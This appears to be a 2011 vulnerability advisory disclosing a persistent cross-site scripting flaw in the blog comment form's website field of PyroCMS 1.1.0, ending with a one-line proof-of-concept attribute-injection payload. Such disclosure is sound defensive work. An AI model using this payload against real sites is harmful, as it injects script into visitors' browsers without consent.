A persistent cross site scripting vulnerability in PyroCMS version 1.1.0 can be exploited to execute arbitrary JavaScript.
93d7260c861238534b00a99f001f285b03bea110189be2a23e57af8dffa3d11c
------------------------------------------------------------------------
Software................PyroCMS 1.1.0
Vulnerability...........Persistent Cross-site Scripting
Threat Level............Moderate (2/5)
Download................http://pyrocms.com/
Vendor Contact Date.....3/11/2011
Disclosure Date.........3/25/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A persistent cross-site scripting vulnerability in PyroCMS 1.1.0 can
be exploited to execute arbitrary JavaScript.
--Exploit--
The website field of the blog comment form is vulnerable to persistent
cross-site scripting. Because the length limits are not enforced
server side they can be bypassed by manipulating the form.
--PoC--
"style="position:absolute;top:0;left:0;width:9999px;height:200px;"onmouseover="alert(0)